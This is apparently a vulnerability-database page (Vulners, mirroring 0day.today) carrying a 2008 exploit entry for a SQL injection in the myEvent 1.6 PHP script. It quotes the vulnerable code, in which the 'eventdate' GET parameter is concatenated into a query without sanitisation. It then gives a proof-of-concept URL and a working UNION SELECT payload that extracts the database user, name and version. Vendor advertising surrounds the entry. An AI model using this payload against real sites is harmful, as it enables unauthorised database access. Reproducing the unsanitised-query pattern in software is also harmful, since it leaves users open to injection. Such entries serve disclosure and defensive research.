Lucene search

K

myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability

🗓️ 15 Oct 2008 00:00:00Reported by JosSType 
zdt
 zdt
🔗 0day.today👁 21 Views

myEvent 1.6 Remote SQL Injection Vulnerability in viewevent.ph

Show more
Code
==============================================================
myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
==============================================================


# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
# url: http://mywebland.com/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

vuln file: /viewevent.php
vuln code:
43: if (isset($_GET['eventdate']))
xx: ...
93: $sql = "SELECT  * FROM event WHERE  date = '$eventdate'" ;

94: $results = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());

95: $event  = mysql_num_rows($results);

PoC:     /viewevent.php?eventdate='[foo]
Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/*



#  0day.today [2018-03-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
21
.json
Report